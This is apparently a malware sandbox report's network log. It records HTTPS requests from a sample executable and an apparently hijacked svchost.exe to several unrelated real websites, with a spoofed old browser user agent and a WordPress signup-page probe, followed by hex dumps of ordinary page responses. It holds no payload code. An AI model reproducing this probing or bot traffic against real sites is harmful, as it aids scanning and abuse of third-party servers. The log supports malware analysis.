                                                                                                                                                                                                                                                                        2023-03-10 06:56:31 UTC2652INData Raw: 66 72 61 6d 65 2d 6c 61 79 6f 75 74 2d 30 20 20 20 6d 74 2d 30 20 6d 62 2d 30 0a 20 20 20 20 0a 0a 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 6c 2d 33 20 63 6f 6c 2d 6c 67 2d 36 20 63 6f 6c 2d 6d 64 2d 36 20 63 6f 6c 2d 73 6d 2d 31 32 20 63 6f 6c 2d 31 32 20 6d 79 2d 34 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 65 72 76 69 63 65 62 6f 78 20 68 2d 31 30 30 20 62 67 2d 6c 69 67 68 74 2d 67 72 65 79 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 63 6f 6c 75 6d 6e 20 68 2d 31 30 30 20 77 2d 31 30 30 20 70 2d 33 20 22 3e 0a
                                                                                                                                                                                                                                                                        Data Ascii: frame-layout-0 mt-0 mb-0 "> <div class="row"> <div class="col-xl-3 col-lg-6 col-md-6 col-sm-12 col-12 my-4"> <div class="servicebox h-100 bg-light-grey d-flex flex-column h-100 w-100 p-3 ">
                                                                                                                                                                                                                                                                        2023-03-10 06:56:31 UTC2668INData Raw: 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 63 65 6e 74 65 72 20 6d 79 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 78 2d 30 20 6d 78 2d 6d 64 2d 35 20 6d 79 2d 32 20 6d 79 2d 6d 64 2d 30 22 20 69 74 65 6d 70 72 6f 70 3d 22 69 74 65 6d 4c 69 73 74 45 6c 65 6d 65 6e 74 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 4c 69 73 74 49 74 65 6d 22 20 61 72 69 61 2d 63 75 72 72 65 6e 74 3d 22 70 61 67 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72
                                                                                                                                                                                                                                                                        Data Ascii: justify-content-center my-3"> <li class="mx-0 mx-md-5 my-2 my-md-0" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem" aria-current="page"> <a hr


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        182192.168.2.6147783.223.113.46443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:31 UTC2652OUTGET /wp-signup.php?new=magicomm.co.uk HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: dataform.co.uk
                                                                                                                                                                                                                                                                        2023-03-10 06:56:32 UTC2800INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Cache-Control: must-revalidate, no-cache, max-age=0
                                                                                                                                                                                                                                                                        Keep-Alive: timeout=2, max=94
                                                                                                                                                                                                                                                                        Content-Length: 48940
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: mobileappversionnumber, x-requested-with
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/7.0.29
                                                                                                                                                                                                                                                                        X-UA-Compatible: IE=EmulateIE10
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        X-Mod-Pagespeed: 1.9.32.14-0
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=10886400
                                                                                                                                                                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:31 GMT
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        2023-03-10 06:56:32 UTC2801INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 36 29 20 7c 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 09 20 20 20 20 3c
                                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html>...[if !(IE 6) | !(IE 7) | !(IE 8) ]>...><html lang="en-US" class="no-js">...<![endif]--><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0"> <
                                                                                                                                                                                                                                                                        2023-03-10 06:56:32 UTC2804INData Raw: 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 74 2e 73 75 70 70 6f 72 74 73 5b 6f 5b 72 5d 5d 29 3b 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 21 74 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 74 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 74 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 2c 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 7c 7c 28 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 72 65 61 64 79 43 61
                                                                                                                                                                                                                                                                        Data Ascii: verythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCa
                                                                                                                                                                                                                                                                        2023-03-10 06:56:32 UTC2812INData Raw: 28 38 29 27 20 64 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 25 33 45 20 20 20 20 20 25 33 43 61 6e 69 6d 61 74 65 20 61 74 74 72 69 62 75 74 65 4e 61 6d 65 3d 27 64 27 20 76 61 6c 75 65 73 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 34 20 56 32 38 20 48 34 20 56 34 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 20 64 75 72 3d 27 31 2e 32 73 27 20 72 65 70 65 61 74 43 6f 75 6e 74 3d 27 69 6e 64 65 66 69 6e 69 74 65 27 20 62 65 67 69 6e 3d 27 30 2e 32 27 20 6b 65 79 74 69 6d 65 73 3d 27 30 3b 2e 32 3b 2e 35 3b 31 27 20 6b 65 79 53 70 6c 69 6e 65 73 3d 27 30 2e 32 20 30 2e 32 20 30 2e 34 20 30 2e 38 3b 30 2e 32 20 30 2e 36 20 30 2e 34 20 30
                                                                                                                                                                                                                                                                        Data Ascii: (8)' d='M0 12 V20 H4 V12z'%3E %3Canimate attributeName='d' values='M0 12 V20 H4 V12z; M0 4 V28 H4 V4z; M0 12 V20 H4 V12z; M0 12 V20 H4 V12z' dur='1.2s' repeatCount='indefinite' begin='0.2' keytimes='0;.2;.5;1' keySplines='0.2 0.2 0.4 0.8;0.2 0.6 0.4 0
                                                                                                                                                                                                                                                                        2023-03-10 06:56:32 UTC2820INData Raw: 70 6c 75 67 69 6e 73 2f 6b 62 2d 73 75 70 70 6f 72 74 2f 61 73 73 65 74 73 2f 6a 73 2f 6b 62 73 2d 61 6a 61 78 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 31 2e 35 2e 34 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 72 65 76 73 6c 69 64 65 72 2f 70 75 62 6c 69 63 2f 61 73 73 65 74 73 2f 6a 73 2f 6a 71 75 65 72 79 2e 74 68 65 6d 65 70 75 6e 63 68 2e 74 6f 6f 6c 73 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 35 2e 34 2e 38 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73
                                                                                                                                                                                                                                                                        Data Ascii: plugins/kb-support/assets/js/kbs-ajax.min.js?ver=1.5.4'></script><script type='text/javascript' src='https://dataform.co.uk/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js?ver=5.4.8'></script><script type='text/javascript' s
                                                                                                                                                                                                                                                                        2023-03-10 06:56:32 UTC2828INData Raw: 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 44 46 2d 69 63 6f 6e 2d 6c 6f 67 6f 2e 73 76 67 22 20 74 79 70 65 3d 22 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 44 46 2d 69 63 6f 6e 2d 6c 6f 67 6f 2e 73 76 67 22 20 74 79 70 65 3d 22 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64
                                                                                                                                                                                                                                                                        Data Ascii: href="https://dataform.co.uk/wp-content/uploads/2023/01/DF-icon-logo.svg" type="" sizes="16x16"/><link rel="icon" href="https://dataform.co.uk/wp-content/uploads/2023/01/DF-icon-logo.svg" type="" sizes="32x32"/><link rel="apple-touch-icon" href="https://d
                                                                                                                                                                                                                                                                        2023-03-10 06:56:32 UTC2836INData Raw: 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 35 32 35 32 35 22 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 64 61 74 61 66 6f 72 6d 2d 6f 76 65 72 76 69 65 77 2f 27 20 64 61 74 61 2d 6c 65 76 65 6c 3d 27 31 27 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 74 65 78 74 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 74 65 78 74 22 3e 44 61 74 61 66 6f 72 6d 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69
                                                                                                                                                                                                                                                                        Data Ascii: e-post_type menu-item-object-page menu-item-52525"><a href='https://dataform.co.uk/dataform-overview/' data-level='1'><span class="menu-item-text"><span class="menu-text">Dataform</span></span></a></li> <li class="menu-item menu-item-type-post_type menu-i
                                                                                                                                                                                                                                                                        2023-03-10 06:56:32 UTC2844INData Raw: 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 64 74 2d 74 68 65 37 2f 6a 73 2f 6d 61 69 6e 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 36 2e 30 2e 31 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 76 61 72 20 77 70 63 66 37 3d 7b 22 61 70 69 53 65 74 74 69 6e 67 73 22 3a 7b 22 72 6f 6f 74 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 5c 2f 77 70 2d 6a 73 6f 6e 5c 2f 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 5c 2f 76 31 22 2c 22 6e 61 6d 65 73 70 61 63 65 22 3a 22 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37
                                                                                                                                                                                                                                                                        Data Ascii: pt' src='https://dataform.co.uk/wp-content/themes/dt-the7/js/main.min.js?ver=6.6.0.1'></script><script type='text/javascript'>//<![CDATA[var wpcf7={"apiSettings":{"root":"https:\/\/dataform.co.uk\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        183192.168.2.62059188.114.97.3443C:\Users\user\Desktop\iJzpyjAehB.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:57 UTC2848OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: hyab.se
                                                                                                                                                                                                                                                                        2023-03-10 06:56:57 UTC2849INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:57 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Location: https://hyab.com
                                                                                                                                                                                                                                                                        Cache-Control: max-age=600
                                                                                                                                                                                                                                                                        Expires: Fri, 10 Mar 2023 07:06:57 GMT
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oKUCU8seDdR0HRqSIRphIdYjtRC9jNEzFfh4LNT7puQWRUpf7P%2FdPEelBNYqA9r%2Fv74N%2FT1pCadvT4ALZ4QL9aJMhTPrpOq2fW7IynS3MeK%2FDm3OZJZ30fhN"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a9267b21694c-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:56:57 UTC2849INData Raw: 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 79 61 62 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: c8<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://hyab.com">here</a>.</p></body></html>
                                                                                                                                                                                                                                                                        2023-03-10 06:56:57 UTC2849INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        184192.168.2.62068185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:57 UTC2849OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: techtrans.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:57 UTC2850INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:57 GMT
                                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                        Expires: 0
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        2023-03-10 06:56:57 UTC2850INData Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c
                                                                                                                                                                                                                                                                        Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        185192.168.2.62083172.67.156.49443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:57 UTC2851OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: orlyhotel.com
                                                                                                                                                                                                                                                                        Cookie: django_language=en
                                                                                                                                                                                                                                                                        2023-03-10 06:56:58 UTC2851INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:58 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Cache-Control: max-age=0, no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Expires: Fri, 10 Mar 2023 06:47:02 GMT
                                                                                                                                                                                                                                                                        Content-Language: en
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 10 Mar 2023 06:47:02 GMT
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        Vary: Accept-Language
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=iVc2lu%2FUWrQ2HIFehNaQ1auxsAvPhTBSDdXR4E6nX3%2BQuiB5U5bYRAuMehwP%2BtyN83CmFhLvMn5vyZBINMMItkhrEcMSi4SGVEo938Gm8N3BJHz94%2FUmfhPS9DeFZRe0"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a929c94e9016-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:56:58 UTC2852INData Raw: 31 62 0d 0a 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 20 28 35 30 30 29 3c 2f 68 31 3e 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 1b<h1>Server Error (500)</h1>
                                                                                                                                                                                                                                                                        2023-03-10 06:56:58 UTC2852INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        186192.168.2.62084104.21.66.220443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:57 UTC2851OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: clinicasanluis.com.co
                                                                                                                                                                                                                                                                        2023-03-10 06:56:58 UTC2852INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:58 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Expires: Wed, 17 Aug 2005 00:00:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Set-Cookie: d55e479f054c94814cbc10d217aaa990=7f6371c835409ef2eb1ca891c7a11820; path=/; HttpOnly
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 10 Mar 2023 06:56:58 GMT
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JUNtY58ClC6CrKQMWPu9eC9exRfwhSI5Ifw10%2B197b0DAS02uGJGpoke1qF1k4rE44sofb8i9%2Fb54yIoZEG0M%2FXeJ6cFl1FmkKVu%2BPUrnkLTId7iIUrtIf4%2FgsQygcT1Ma%2BWpoiuZPc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a929da5b9b31-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:56:58 UTC2853INData Raw: 37 63 34 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 45 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 69 6e 69 63 61 73 61 6e 6c 75 69 73 2e 63 6f 6d 2e 63 6f 2f 22 20
                                                                                                                                                                                                                                                                        Data Ascii: 7c4a<!DOCTYPE html><html lang="es-ES" dir="ltr"><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><base href="https://clinicasanluis.com.co/"
